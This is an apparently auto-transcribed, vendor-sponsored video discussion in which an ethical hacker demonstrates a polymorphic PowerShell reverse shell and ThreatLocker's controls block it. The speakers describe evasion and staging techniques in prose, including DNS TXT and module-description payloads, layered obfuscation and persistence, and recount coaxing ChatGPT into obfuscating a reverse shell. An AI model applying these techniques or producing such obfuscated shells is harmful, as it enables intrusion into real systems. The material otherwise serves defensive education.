Can this Mind Blowing ๐Ÿคฏ Reverse Shell be stopped? (Powershell Hack)

David Bombal ยท Beginner ยท๐Ÿ” Cybersecurity ยท1y ago

Key Takeaways

The video discusses how to stop a mind-blowing reverse shell in Powershell, using tools like ThreatLocker, Crowd Strike, and Elastic Sentinel, and techniques such as behavior-based detection, ring fencing, and zero trust model.

Full Transcript

so what we're going to go ahead and do is we're going to switch over to the malware box and then we're going to go ahead and run the exact same command and then up here this is my actual local system we're going to run the API call pull down one of those reverse shells that they jumo code that you just seen and then just pipe it right into IEX get it to run I have spoken to customers who have implemented similar Solutions and I know what a pain it can be I mean I spoke to one organization who have spent and this is not an exaggeration four years on a project I I just thought about something while you were talking have you guys ever like even dabbled with the concept of using like maybe this is dumb and crazy but have you da with the thought of using this as an anti-che for video games everyone it's David bble back with the amazing jacobe jacobe great to have you back on the show I appreciate you brother hey dude the thing that you showed us last time was insane you got to tell us what it was um I was blown away by it we had so many amazing comments on YouTube about what you created yeah um it's probably one of my favorite projects I've ever been a part of it's a polymorphic reverse shell generator generator technically even though I said last time it was just a generator but a reverse shell is something that a hacker can run on a Target system to gain control of it um now most of the shells that are out there you can go and find them they get detected really easily so a lot of time it comes down to you having to make these modifications to it to get it to go through it's a very slow tedious process I just managed to optimize it and streamline it and made a program that'll do it for me and on the spot and then I turned it into an API so I can just do a single call up to it and every single time I do it'll generate a polymorphic reverse shell that has never been run before so it won't match any known signatures or anything so you were saying that no antivirus was able to pick it up is that right so you want to be careful on the internet saying things like always and never but at the same time um it's always worked and it had never been caught uh up until recently um but yeah so anyway so I developed a polymorphic reverse shell and then got a couple different friends that had different setups with a bunch of different antiviruses and I just had people reach out to me that had an environment that they could run it on and so I ran it against the crowd strike elastic Sentinel one you know obviously Defender a handful of other smaller ones and it just it went through every single time and in that interview you did mention there was one company right that um picked it up or and blocked it is is that correct yeah absolutely so at the time they hadn't picked it up and blocked it yet but it's someone that I'd been in communication with and they had a really cool concept and it it's it's especially awesome because I had been getting frustrated I know that's weird to say but I'd actually been getting frustrated that I kept beating everyone because it shouldn't be like that and so so i' had been in contact with a company called threat Locker I met a guy there named Ivan who was a wonderful individual helped me out with a few things and we got to chatting and he started showing me off some of what they were doing and uh so they do a lot of behavior-based detection and really really like stick to the zero trust model as opposed to a lot of these other edrs that will uh let something run or scan it and then run something against the output and then block it after but when it comes to something like a reverse shell I only need one single command and if I get to run it you're already too late I own the computer so threat Locker does behavior-based detection and uh they have a a concept called ring fencing that they use which is uh a way to track how different applications communicate with each other or different processes and if I remember correctly I believe it stays on your system for about 30 to 60 days and studies the behavior of the user to create a baseline uh for whatever company individual it is and then they use that to found outliers in behaviors that aren't normal and they go ahead and block them in advance before uh you know they allow some sort of infection to take place last time we spoke you had a sad story and I think it's important that we highlight this again you are an ethical hacker you're not a black hat and companies should be glad that someone like you is really testing their systems and like you just said now you were kind of disappointed that this wasn't getting picked up because you know we want to protect companies we want to help them better protect themselves it was fantastic that thread Locker picked this up so you know at least someone was picking it up I have to say this this video sponsored by threat locker and I've asked threat Locker to come on and answer some questions and see who wins will red team win today or will blue team win today Red Team Versus Blue [Music] Team but before we get there I mean do you want to say anything else or do you want to demonstrate you know this hack and perhaps how it got blocked I jacku versus machine with th Locker uh I'll go and give you a demo on my main system uh this will be the system that does not have threat locker without any sort of detection so you can just see how quickly and easily that this can be run and there of course a lot of different ways to implement it we're going to stick to basics for here just to get the concept across but I literally just have an API endpoint where I can pass up an IP and a port two and then a key which IV will be changing this after the video for sure yeah um but this is a simple oneliner that is going to call up to my API and then it spits out a reverse shell that is uh heavily obfuscated and this took a decent amount of work because it's not as easy as just simply off your skap it because there's a lot of different detection methods for this that uh different edrs and EVS use to try to find it whether it be looking for certain key words like you can't have reverse shell inside one of these like the word reverse shell it'll get knocked that's an obvious one but there are a lot of other little things that they look for or they don't look for and even one thing I found out is if you obfuscate it too much it gets detected even by Defender which is like the low end it is too unhuman readable and it will even Defender will block it although I've beaten like Crow strike elastic one whatever so uh you'll see inside of here um a lot of times I'll use something like four files as the human readable characters but essentially just a little things like that leaving just a little bit of human readable code uh will'll get it past certain things so this was a significant amount of trial and error towards the beginning so what we're going to do is we'll go ahead and turn on our netcat listener on our intermediary box so that that box at the bottom right sorry to interrupt is that's that's somewhere in the cloud preps and then the device at the top is the device that that's getting hacked is that correct yes absolutely so what a lot of hackers we do is we'll have a jump box in between ourselves and the target uh just as an extra little proxy in this case I have a jump box that connects to the Target system that calls back to a separate a separate box so I have two of them that are hosted one's the jump box one's the actual API itself you want to try to keep as much segregation as possible but what we're going to do is we're just turning on The Listener for our jump box that we'll be using to catch the shell and then up here this is my actual local system we're going to run the API call pull down one of those reverse shells that they jumo code that you just seen and then just pipe it right into I ex get it to run oh that's awesome and you'll see down here we have connection received um plny little thing I did on my computer a lot of hackers the first thing they'll run is the who am I command to see you can actually reassign that function so it doesn't spit out what it's supposed to which is what I did so now I time someone tries to run it it just says I am the ghost in the machine that's not the name of my computer or whatever my username little fun tidbit but yeah we can just go pop pop open in the calculator real quick and you'll see this is on the on my PC hackers use calculator just to test to see that stuff works so yeah as of right now I have control of uh my main system you just go and hit clear screen up there whatever and we can control C out of that and and you see the connection has been cut but as long as that connection is there I have full control over the PC and then I in my repository my personal repository I have a lot of different persistence methods really all that API call has to be run every single time the computer's turned on whether you want to put it into a startup folder sneak it into their Powershell profile some DL side loading whatever it is it doesn't really matter as long as you can get that single oneliner to run every time the computer starts again it'll generate a brand new polymorphic reverse shell so it'll be different than the shell that was ran last time and every single signature is unique none of them will ever ever be the same as any other shell that's run I've been working on this for like two and a half years um slightly on and off but making little fixes here taking suggestions from the community running it past some friends so what we're going to go ahead and do is we're going to to switch over to the malware box IR jackob versus threat Locker [Music] and then we're going to go ahead and run the exact same command and pipe it into I and you'll see unable to connect to the remote server this shows a simple block there are other ways to also get this shell onto a system so I want to show that they're not actually just blocking the API because anybody can just simply block an API if you know what the website is and that's really simple I don't want to say there's nothing special about that but once this website gets out like it's obviously going to be blacklisted everywhere so that isn't much of a mitigation in itself so I have a bunch of other methods that I can also use so for example what we're going to do just before you do that sorry j to interrupt again because I'm slow right I'm the Boomer so I'm slow that box the red like the big the second one that you've just run the command on is that how is that different to what you just showed us is this running threat Locker yes yes so absolutely so right now the red box that you see right here is my junk malware laptop that I have I've put some heat onto and I went ahead and I cleared it out wiped it completely and then connected with the threat Locker team and the implementation to get thread Locker around in the system was so much simpler than I thought it was going to be I actually haven't even brought that up to you guys it was actually impressive it was actually impressive how quickly and easily it was to implement impressive very nice like shockingly it almost feels like they shelled me I'm not even going to lie um so the setup was absolutely brilliant so yeah this is just an extra laptop we got threat Locker running onto it right now and uh so again I I want to show that they're not just doing something simple as like a DNS block right I have a bunch of other techniques and some of them I'm actually not going to share today because they're that secret but I I I'll pop a couple of them out um great because the last time you did that that DNS bouncing thing man that was crazy yeah the the DAT the data balancing was absolutely brilliant I'll have to talk to these guys at some point um I haven't got to test through that with them but I'm curious to know how that would work as well actually because that is the single best data exfiltration method that has ever existed or probably ever will until somebody invents teleportation to where you steal it on USB and teleport that USB drive that would be data bouncing if you guys want to Google that it is the coolest data X filtration method in existence period hands down without a doubt just for everyone watching I've put a link to our previous video where jacobe goes through this in a lot of detail I mean it's really insane what he did so I highly recommend that you go and look at that I often get comments on YouTube like David this stuff isn't real world the stuff is too simple so if you want to really see like hardcore crazy hacking go and look at that video and it's really impressive I think jacobe that you know thread lockers blocking this because if they can block you know you that means a lot of companies are going to be a lot saer it's it's honestly impressive impressive very nice and so again I want to highlight that they're not just doing some basic DNS block my website API so there's a bunch of different methods for this so again what we're going to do is I'm going to switch back to my main system again just to show you something so we'll go ahead and run this one more time just to show it generated so obviously every single time I run this it generates a brand new one that has never been run before so using the API is how you get a fresh new one every single time on the spot but if the API itself is blocked and again I you could make proxies to send this to another one so it's a different website that pulls it um and that might be something I look into into the future but you can also just simply copy and paste this reverse shell and put it somewhere pull it down I like a lot of my uh ducky script payloads that I got you know known for is me just hosting a payload on GitHub and using something like invoke rest method uh invoke web request to pull it down and execute it so you can still do that as well um one of the sneakiest techniques that I've ever seen and it's it honestly it changed the trajectory of how I write some of my malware there's a guy on Twitter his name is aled and I want to say almost a year and a half two years ago he just randomly decided to share with the world that you can use DNS text records to store uh different strings in or in this case malware samples that you can pull down and what's really cool about that is a lot of systems they like to look at using things like invoke web request and invoke rest method and if that's going someplace that's not good then they'll block it or a lot of those sometimes are even I don't say blocked by default but they're they're nerfed to the ground so he pointed out that instead of using either one of those you can actually use resolve DNS name to go to a text uh TNS record will pull the type down its text and then so this PR I'll actually do without doing that so if you run it just like this you'll see the malware sample right here so it'll you know this is the DNS text record itself shows it's a text blah BL blah blah and then the strings what it does dnsx records are typically supposed to be uh I want to say the limit was 255 characters but there's a different way that you can pull them down where it'll just split your string into 255 characters uh for you and if you saw the full command that I was just running there at the end we're going to pipe it for each strings and join them and here it is the reverse shell again instead of now this one is not Dynamic it's not technically polymorphic like it is it is the output of the polymorphic reverse shell in itself the the co itself is not polymorphic every time I run resolve DNS name it's going to pull down this exact one so that is a a slight weakness if you want to call it that so might not be the persistent method that you use per se but we're going to go back over to our malware box no just want to another question because I'm sure the audience want to know this you said this is a laptop right so this is a physical box yes absolutely yeah I have them both in front of me right now I'm just using a capture card to pull the screen over so you've got two physical boxes one is this is the one that's running uh thread Locker the other one is is running just like a Windows Defender or something and you're just getting by P that all the time but here you you perhaps struggling correct correct I well I to be fair I have another antivirus on that one it's just disabled for this video okay um but even if it was on it would it would walk right through it but there's some other things that it kind of sometimes messes up some of these other methods that I just wanted to be cleared uh so we did pull that down for here so we're going to go down to resolve DNS name again so I noticed that uh when we do the resolve DNS name I can actually pull it down so you see that we're on the threat Locker box I am able to pull the string down but if we go to run it however with that piping it into IEX invoke expression it it will uh spit out all these errors that you see here andex you put that's Powershell run correct correct yeah so if you see right here at the top exception calling with two arguments no connection be made I got a more verbose error message the first time when I was running it off stream but essentially it said thrat Locker had refused to allow it to connect because it was not an authorized attempt to access one of the sockets okay that I was using to uh block it out so it's looking like it's actually feeding that arrow through really quick it clears the screen and then shows that the connection is not allowed to be made they're blocking my connection to the site but again keeping in mind that since we're not doing an API call right now this isn't actually going to my my API at all this is going straight to the jump box where they're refusing the connection from inside which they're literally the first people to do that it feels good and bad it feels it feels bad that you didn't you know that you couldn't pop it and take control right but it it I think for all of the Defenders it's the best news ever yeah yeah so it's that yeah there's a lot of emotions in that one it's it's good that well not good that you know I finally got defeated but it's also awesome that you know these guys took the time to take it seriously cuz uh you know I don't know if you for some of the people that have been following me uh you know if you saw some of the bounties that I turned in last year exactly I got I got royally screwed over Y and um a lot of the vulnerabilities are still there some of them they haven't deemed high enough and then couple times they've gone through and you know made a couple changes behind my back but the thing is the problem with the changes that they made since they didn't consult me it took me all of about six minutes to just slightly change up what I was doing and uh you know just fix what they did like one of the times like I'll say for hypothetical easier to illustrate purposes in order for them to beat my reverse shell what they were doing is they were adding an invisible Punjabi character at the end of my string so one of the other methods you can use instead of pulling from DNS text records you can pull it from the description of Powershell modules because Powell modules are accessible to all things so what what you know what you can do let me switch back to this one we'll do a CLE CLS I have we'll do find module Fimo for short we'll do C2 uh I there shouldn't be a module called C2 by the way but here we are we'll grab the description and it should just say this is an example some along those lines oh yeah except this in Bas 64 cuz mware you can read that in your head man you're living in The Matrix unlike us normal people there's a couple of them that I have absolutely memorized start Cal this is a side I think I'm going get that tattooed on me start Cal in Bas 6 for just because that's always my test basic C4 string that's completely random but so you can put uh malware in the description of poell modules Powershell modules you're not necessarily supposed to be able to access the code that's inside of them without doing import module going through the UAC and then there's other processes that will corporate policies that might stop certain things absolutely nothing stops you from quering the description of a Powershell module and you can f a lot in there or you can combine them so uh I I put a reverse shell in the description of the module but I noticed one of the fixes they try to do and they try to Nerf me from doing this again is they put an invisible Punjabi character at the end of the string of all the descriptions of every Powershell module so you pull it down and try to run it it'll error out but that's a simple Rex expression to get rid of any characters that aren't you know AC so it was I added an extra like 13 characters to my oneliner kept it under 259 characters so it still fits in this run box down here which also just random they nerfed me here too if you guys know all of my ducky script payloads everything like I said it's all about hosting the payload up here using invoke rest method to pull it down and then execute it which I did from the Run box with like the rubber ducky because you just window R type it in and it opens up runs it without the window popping open what they did is they made the Run box work with Powershell version two now instead which doesn't have access to invoke rest method or invoke web request so when I run this it's going to say sorry it's been depreciated it we're running Powershell 02028 uh so they actually nerfed all of my all my payloads but the little mitigation process is that companies like this try without actually Consulting someone like me like it's it's a joke it's a joke so for someone like threat Locker like for them to finally reach out for us to have the communication to go back and forth and then for me to finally get on to one of their systems where I could test with their software and get beat it was so Bittersweet but it was still sweet great Locker wins the thing is you've made the world a safer Place dude there's there's huge you know kudos for doing that can we go back to um you had mentioned that the first time you had run the commands on your machine that there was a more detailed error message um if you go into the agent in the the system tray on that machine um you should be able to reset the history and then if you try it again hopefully the the first error will pop up again I just go reset history you're saying right here yeah that's the one I'm uh Curious to hear how you would go about implementing a procedure to block the um the DNS bouncing of data I am not even going to lie to you I don't think it's possible BEC because I okay it was one thing when it was datab bouncing but then I found out that I could use um the Google DNS lookup servers like you can go to like dns.com and you can use it to query DNS records right so I'm actually using Google to do it for me so I really just don't know how people are going to how they would block that I'm not even going to lie that's why I was so curious to see like how uh kind I guess what kind of implementation you guys might be able to try to pull off this we can do testing with we shared some information but uh we might with ring fencing like we can block power shell from the internet I was going to say I have a suspicion I know I might know what's happening when you try and do that the first time jackob which is obviously with ring fencing we're controlling what Parell can do where it can go where it can connect to on the internet from my experience playing with it specifically with reverse shells the initial connection outwards from Powershell to your reverse shell server the actual connection itself is actually permitted as soon as so much as a bite of data it tries to transmit it's then blocked so I think that little sort of glitch that you saw where it looked like it was connected but then it didn't it was because as soon as data was transferred correct uh I saw that before myself with a piece of malware uh par shell malware that we came across and it basically it looked to me for all the world it's like I'd get the connection on the neck hat listener and I'm going oh my God this thing is after bypassing ring fencing but when I actually tried to do anything I.E press return or do anything that involved data going back and forth the connection was immediately closed so I suspect that might explain what you're saying yeah that's actually exactly what happened I got connection uh and then I always do start Cal that's just the Thing Once youp anything it disconnect connection was immediately dropped was immediately dropped that expl I was I was actually caught off guard I was like yep I got you thought you thought you bypass that Locker yeah y so yeah I I I messaged him immediately I was like well played well played Ju Just to confirm we didn't need to do anything we didn't need to configure anything set anything up tweak anything adjust anything block anything when we saw it happening it's just purely because we control where par shell can go on the internet basically as you said earlier on WE block by default so it's not as if we had to adjust for your behavior we had to block a particular location none of that it's just we say power shell should not be allowed to access the entire internet so we don't allow it to access the entire internet except what is wh listed eventually has exactly so deny by perit by exception which again is absolutely brilliant um people really underestimate the strength of Powershell they think that because it's not as robust of a language and quote unquote you can't do as much that it's somehow inferior to the other programming languages that people use for malware but there's two very there's two very important things one I'm going to let you in on a secret if you I know it's GNA be in the video but if you guys tell anyone I'm going to be so mad I'm just I'm just kidding um I use some python on my my malware server where the API is done not for this particular project but I have other things that I'm working on where I do use some other languages and the thing is it it doesn't matter because it's all done server side over there and I'm just using Powershell to collect whatever I need afterwards so I can still use other languages elsewhere the thing is is if you're doing malware development in my opinion you should always be using Powershell it's a little bit for you guys that don't know what that is that just a living off the land binary meaning that you don't have to download any thirdparty anything to make it work you don't have to convert this to an exe and then try to get the exe pass because you made it look like a picture even though that's fun but you just don't have to it's just it's extra so Powershell the way that I tried to like explain it to people even like the difference between Powershell local system and C is C so heavily looked after and monitored and all the processes whereas it's seen as an attacker whereas Powershell itself is more so seen as like The Bodyguard or like the bouncer that's outside of a club that's like hey you can get in you can't get in and it's usually as simple as that a binary yes or no you can get in you cannot and all I need is the yes everything else is done serde and I can do a simple API call with Powershell and do whatever I want so that's something that nobody else really I'm not gonna lie nobody else really takes seriously they're oh it's just power showell it's like it's all that I need could could I um could I wager that most attackers take it pretty seriously exactly yeah yeah even if Abol Defenders don't I mean it's I saw statistics that something like 90% of Ransom a attacks will use power Shell at some point in their execution might be running remote code it might be downloading payloads running it um I don't know if you guys are familiar with so as you may have guessed from my thick Michigan accent I'm not from around these parts um I'm from Ireland and the Irish helter was the hsse was wiped out back in 2021 by a ransomware attack but they did a fairly detailed um analysis of what had happened and it all started with a malformed Excel document basically that open Powershell poell deployed to Cobalt strike Beacon basically doing what you're showing for all intents and purposes um but as part of the breakdown Powershell was used at about five different stages of that attack so they use it to as I said deploy the cobal strike Beacon they use it to delete Shadow copies they use it to download and execute the payload so five different stages of that complex attack involved power shell and as you said jackob it makes perfect sense to use it because it's on every Windows computer and you can do so much with it it's one of the things that we try and tell people about all the time is you got I mean our one of our tag lines by the way is stop Parell from eating your lunch why you trying to eat my own because that's brilliant yeah it it it's so easy to weaponize as I've um been trying to get more involved with different communities a lot of the friends that I've been making recently they're not even hackers the Powershell Community is strong and there are a lot of people that do some amazing things and you know I've done a couple of demos with them and uh just showed off what I'm doing with pow show it was so crazy to be in a room with like multiple Microsoft MVPs and demo something and then at the end of it like I watched jaws drop the questions I was getting asked the things people were saying oh my God I didn't know you could do that you know I never really thought about this is always just been like a you know for administrators to rename files or batch you know this or that and um you know they just even some of the best that was that was when it really really hit me that I was like yo you're on to something here with all these Microsoft MVPs where they don't necessarily insecure but they find bugs all the time and they report them they just don't actually know the the full scope of what they just reported you know what I mean so a lot of these guys I'll study some of the work that they do the bugs that they turn in or the little techniques that they have and it's like do you have any idea what you've just done I know that like you're such a good person that you can't even imagine how that can be used wrong but you just made a whole C2 platform and you think it's for controlling OBS but guess what now every single streamer out there is now vulnerable because you streamline the entire process of controlling OBS getting their keys you know everything you streamline the whole process and control it with Powershell I turn it into a little module I literally have a Powershell module to make other Powershell modules malicious like subm modules form just to add slightly more functional to them so I can use them in a way you absolutely never intended and uh yeah it's it's crazy what's out there but seeing like again hold those Microsoft mpps who are they're Geniuses they are so much smarter than me like it's crazy for me to sit in front of some of these guys and I'm like oh my God I'm a fraud I oh my God they're so smart you're amazing dude that's why I want you to I wanted to have you back on the channel right because if a if a company can block you then it it shows that they're doing something right so yeah if we go back to here I've gone like an extra mile and so I haven't had to do any of this stuff so again based off all the testing I've done before with all of these different uh antiviruses if you look up here it shows API one I'm on version four I'm on version four this is the public one you know what I mean but what we're going to do is after key right here we're going to do and E for coding equals I can do B we'll get it in base 64 um and then it's stackable so whereas I could do just this one might or we'll do zero so you you'll see it you can do it in binary get the output in binary but again these are stackable so I can do like a base 6 E4 then reverse it put it in binary so again it'll be here that will do a shift right so then we'll shift every single character up too so it'll be twos and threes right I I just have this for now it's X for as encryption as well now the as encryption itself is hardcoded typically you'll want to be able to pass your key in right here or whatever you know what I mean but for my testing purposes on V1 now it's AES encrypted and then we can go even a step further and this is where there's going to be a lot more experimentation and hopefully I can continue to work with threat Locker because listen listen when you guys slap me down this morning listen I'm I'm I'm not going to lie I'm happy for you but I'm coming for you like I'm coming for you and so we'll do L at the end here and that this one's going to take like four or five seconds because it's going to do all that and then spit it up and Shell Code now once it's in Shell Code we can now do D side loing process injection I mean there there's an insane amount of uh other options again I'm not sure if this will make it into the video per se but we're going to import this module Lin do show modules uh this is a module that I made that is working based off of the website the low boss project those guys they're my heroes they're so smart um so I go on there I'm pull open yes okay so we're going to grab all three of these copy we'll paste this over and then we'll do existing L bin pass actual all x c cuz I'm lazy yes I I I made an alias for clear screen so it's just C uh and then we'll go to the existing Lin paths and these are all the different Lins that were found on this system so every single one of these can probably be exploited in some way or another you know obviously you just saw like Misha Misha gets you know detected a lot but there are a lot of them in here that uh I can use for different implementation methods for getting this the the reverse shell string onto the system or you know having to go through Shell Code or whatever else so ideally there might be some more advanced demos later uh highlighting some of these so just to explain um jackob you mentioned at the beginning about sort of Behavioral based uh detection that's part of what we need what we do but it's not all of what we do um the main thrust of our product is around control so it's basically a set of rules um now there's a few different aspects to it you've obviously pointed out ring fencing which is fundamentally a control it's about allowing applications do what they need to do and no more um we also have an allow listing um component so allow listing again is a control it's what can run or what can't run obviously it's going to stop not just bad things like malware or ransomware for running but also good things that can be misused so you're win R and seven Zips and you know remote access tools anid desks things like that things that are not necessarily bad but that can be weaponized and misused um but again we've got other control components as well around networking we've got controls around um storage data you know what programs can access what data but most of what's been blocking you most of what's been frustrating you is not because we've detected your doing bad stuff most of what's been blocking and frustrating you is because we fundamentally deny by by default so as I said what can run or what can't run but also behaviors so there's no I don't want to say there's no detection required we do have a detection component as well which is s Locker detect this one the detect team on the call with us here we are seeing that you're trying to do these things but again we're seeing you're trying to do those these things whilst they're being blocked as you correctly pointed out there's very little point in detecting after something has happened because it's probably going to too late to be too late so what we're doing is blocking first and basically detecting second which is cool absolutely which is exceptionally cool for two more reasons uh so one of course you're doing like um Advanced mitigation but you're also following like something that's pounded that was pounded into us into the military is the anagram Pace like you are not prepared unless you follow Pace you need a primary plan an alternate plan a contingency plan and an emergency plan so while there is detection it's not necessarily the main thing that's being used but it is the alternative plan and then there's a contingency plan and then an emergency plan but again the coolest thing and this actually works out well pace P you guys are being preemptive that is the big difference right a lot of other people they do follow Pace actually and good for them it's just that P doesn't stand for preemptive for them it's just primary uh so that's pretty cool but uh what you were saying about blocking a bunch of other systems like any desk and any other softwares that could be used again something you guys should for sure look into is the little boss project because that's literally what all of these are so while while you guys do block things like maybe Powers shelf or such pester for example has a way of using Powershell from inside of pester and in the process is it will show it as being pester unless you go through like three deep in uh like proon or something you know you'd have to like go three instances deep before you even see that it's calling Powershell now I lied about pester because that one's actually only too deep let's be okay actually I should have yeah clarification but there are some of these other ones uh that do uh also call Powershell but the process is so deep like it's like three or four because it's like it's like their first call and then they call into pester and then pester calls a process that then calls Powershell so sometimes when it's nested yeah sometimes when it's nested a little bit further those processes don't get caught now I don't want to speak for you guys you know right you know what I'm saying but you guys are the only ones so far that I've heard that have something implemented that's looking for this level of integration like that deep so that's pretty cool we I'd love to see that on a on a machine running thrat locker and certainly something we'd love to explore with you uh just on the subject of um law bins by the way so obviously it's something we're very much aware of and you know preventing weaponization of trusted software is almost as important as what can run or what can't run so we've got a bunch of default ring fencing policies I think about 23 or 24 default ring ring fencing policies that every new group of machines um will get so it's everything from Powershell to curl to Red surve to rund dll basically same Principle as with Powershell just controlling what they can get what they can do where they four files that exact list that you just started naming off that one's right in there yeah four files has been like my go-to for the last couple years that's the that's probably the first one that I try it's like the first one that's like just off of the list of normal ones checked like how you just listed four of them and you technically left all four files you're aware of it but that's also one that a lot of other people uh leave off specifically using four files to call in execute or you know whatever else so as I said we didn't have to respond uh to anything jackob was doing we didn't have to change anything specifically for him it is a relatively typical setup um that he's working inside we did add some policies so we have a standard set of I think it's about 40 policies in total that you know any new group of computers a group of Workstation we'll get uh we did add a few extra ones which are basically Microsoft recommended ones um so basically Microsoft had a list of things that they recommend they should block to hard in your environment so things like WSL that kind of stuff now I know jackob hasn't used any of them in this demonstration but we did add sort of sprink a little bit of um those recommended policies on top of the default set and we did tighten up on networking as well again not specifically relevant to what jackob has been doing or using but we did add some Network control policies just in case he did manage to do something that you know bypassed our controls which thankfully he hasn't so far yeah I mean jacobe is that is white flag time for you right or you gonna you're gonna come back with vengeance oh oh did I mean the gauntlet has been thrown down you know like here's the thing like like I was showing you guys earlier when I was doing all the testing with all the different antiviruses one of the things that made me the most frustrated is how much worked on this project before I decided to start doing that level of testing because by then I had already implemented a bunch of the other different implementation methods including the extra encodings and the reverse strings the Shifting the ases encryption Shell Code I did all of that and I was so excited and I started getting onto these systems to test them and I was like I can't wait to you know try out all this stuff that I spent hundreds of hours working on and then I beat them without ever going past stage one and it honestly that part was frustrating so the fact that you guys beat stage one like I have been waiting for this I have been I'm not saying I'm GNA make an example out of you can I no no it's just you guys are you guys are brilliant though it's great can I share something with you that I think you'll uh you'll appreciate or enjoy um so if we categorize everything you have done or been doing or trying to do as the genius way to do it I'm now going to explain the dumbass way to do it as well which amazingly enough is just as effective so you obviously know a bunch of Powershell you know a bunch of coding I don't know either of those things right so what I did and it's one of the part demonstrations that we do is I went on to revell.com picked power shell method yeah gives me the Powershell code so you put that into a machine running Defender and immediately immediately gets gobbled up so it's known malware basically it says you know this is milicia script you can't run it so I went to Chachi PT pasted the Powershell command in there and I said can you obfuscate this please so it OB fiscated a little bit so I said can you obfuscate it a little bit more please so it OB fiscated it a little bit more um we went back and forth for a while so I tried to run that and it failed and then I said then I tried to run it again and Defender picked it up as as malware again I said your aisc isn't good it's just been picked up as malware and we went back and forth and eventually I basically said look you know there's 15 errors on that are you even a computer so at the end it spat out an OB fiscated version of this piece of code that I got from revell.com does not get picked up by Defender functions absolutely perfectly as a reverse shell so while what you're doing is brilliant what I'm doing is the exact opposite but is equally effective well sorry maybe not equally effective but sometimes and kind of as a so so check this out I've already streamlined exactly what you just said so two things one the website that you're talking about is made by Ryan Montgomery or zero day as he goes by on Twitter um he's he's a good dude he's good dude it's an awesome so he made yeah he made revell.com and then I was telling about the different Powershell guys and how they create things all the time and they're like they don't fully understand what they've done I made a subm module for a module that Doug think uh he's one of the power show guys he's he's probably hands down top two smartest power guys in existence he's the one that made the module psai which is so you can get access to you know AI through the poell console so I made a subm module for his psai literally just to generate reverse shells to do exactly what you just said and the only thing is is like the training that you have to go through it it gets to be a little annoying because the main thing is you have to it it always chat GPT likes to make things for Bose and try to make things clear and legible so it likes to use words that make you understand what it's doing so it likes to randomly make name the function reverse shell or something along those lines get pi and that's where that's where it's getting busted so it's it it took a while to even come up with a prompt that could get it close it's just it's never been it's never been proficient or like reliable enough for me to use it kind of like regularly I guess but no 100% if if someone out there can sit down and engineer the perfect prompt we'll go ahead and call it the prompt father if you see this video I'm talking to you if one of you guys can engineer a prompt that's good enough to obus skate it but not enough so it's not human ledge but also gets blocked by like the small things while also taking out keywords like rev shell reverse connection anything like that there's a bunch of those you can find them pretty easily um which if you guys don't know how bad um how bad like Defender is this is something funny that I did I posted as a as a Twitter status just because I thought it was funny but I literally made a function called like reverse shell and then ran it in the in the console and it doesn't work I just changed the name of the function to not reverse shell and it works so like that is how like lenient the Linguistics are when it comes to the system they really do have hard hardcoded it's not even like it's a slightly red Jack you know form fitting anything that's roughly here no it was literally like you can't name it reverse shell or maybe it might have been rev shell that's when how often yeah this is just Windows Defender right now and so so what you're saying is Windows Defender ju can't pick up even the most basic stuff it seems okay no so even that one works but one of them got detected I found the exact one it's it's it's some form of reverse shell but it got detected I just named it not that and it goes through so yeah if anybody wants to take that challenge and see if they can get chat GPT through the API through Doug Finks module yeah you can you can get a a a whole polymorphic reverse shell generator just like that it just might not be consistent per se yeah oh oh but there's more as well um because I made sure the prep It Go all doomsday in case someh you did man to get a shell because even if you do semi manage to get it well the idea was even if you have a connection well we're going to make sure that it's very very difficult for you to do anything so if um you were to try to say um read a file in like your documents or your desktop and you can even try on your machine right now um you shouldn't be able to see what's inside those folders this it was a challenge I gave to some Co to a local College um cyber security team I gave them a box of damble web app and um made sure the settings on it were as easy as possible and then took off things like Defender I took off like other security measures and only had threat Locker on it um they were able to get in and I blame them when I was going new testing I couldn't get in they had a flag on the desktop that all they had to do to win was read off the contents in that flag text file in the desktop um they they couldn't do it there's no way they're able to read it and that being said if they were on the physical machine you could just open it with notepad it been fine oh yes that's blocked as a whole so I can't programmatically make it if you open up something like notepad you could do it in there yeah that's what we about to do but make one this way do test cookies is my test string for everything I do get content this up by search prois oh that's even for that that I don't know no there's no way you guys caught that that was auto complete that got yeah that was that was auto complete makes sense actually yeah that got that got rocked yep so even like even if I did get the reverse shell onto the system again I think you guys and you can give clarification I I mentioned this earlier I think you guys said you have this software on the individual corporate system for like 30 to 60 days to study behaviors doesn't doesn't take 30 to 60 days in most environments it's a week maybe most 10 days for us to I'm not sure why I had that number in there but yeah yeah so um effectively what we do system and someone's not programmatically going around trying to grab text and there's no reason to allow it to be honest there's some things that we don't even learn anyway so the likes of storage control policies that what Nick set up there um we don't learn them what we learned is application control policies so basically what needs to run on a user's machine we create a list of rules fundamentally based off that and as I said after a week 10 days typically you know you're in a fairly good position or fairly close to the point where you should be able to secure but we do it with customers on call so it's not as if they have to set everything up up themselves and figure out how to use everything we very much hold their hand all the way through the process so guys I'm always the slow one in the room explain to me how this works so like how are you doing this is there software installed on the local computer I'm assuming that's true and then how are you stopping like all of these calls so can you just give us like some understanding of how it actually works um so fundamentally yes there's an agent installed on the machine um very low impact you know very low CPU use very low memory use typically you know 0 to 1% CPU and couple hundred Megs of ram um the reason it can be so low low impact is fundamentally it's just making binary decisions it's making yes or no decisions based on things that try to happen um so as I mentioned earlier we've got controls fundamentally is what we do so we've got application control so allowing certain things to run and then blocking everything else by default all the stuff that jackob has been uh frustrated or a lot of the stuff Jack's been frustrated with here has been ring fencing which is just about controlling what application can do that which is on the screen at the moment is storage control so basically blocking certain applications or blocking all applications from accessing certain storage locations um is another function and obviously we've got Network control as well which Nick mentioned a moment ago which is just controlling outbound and inbound Network traffic again all from the agent at the endpoint how does it do this though because I mean if it's just a piece of software does it have access to the kernel or how's it actually intercepting everything so fundamentally there's a couple of pieces to it so we've got a service and a driver um the service is the bit that fund that makes the decisions the driver gives information to the service to make those decisions so it basically says you know this thing is trying to run the service sent say allow it or deny it but pretty straightforward really that's structurally and fundamentally that's it obviously we've got a portal where we configure all these policies to allow certain things to deny others we've got a learning period as I mentioned where we build all those policies out in most cases automatically so it's a really you know it's a really light lift in comparison with some other similar tools that employe allow listing where you have to basically figure out everything that's required you don't need to do that with r Locker we pit him figure out what normal behavior is yeah so as long as you stay within those boundaries fundamentally we're not even going to get in your way you're not going to notice we're there it's not like we're using you know AI or black magic or something trying to figure out if stuff is good or bad we don't really need to do that for the most part although as I said we do have detection capabilities they're just not the primary method of protection so the difference here is rather than trying to discover if it's if it's if something's malicious you're just blocking everything and only permitting certain things that you that that You' already predetermined are good right correct deny by default permit by exception fundamentally I I just thought about something while you were talking have you guys ever like even 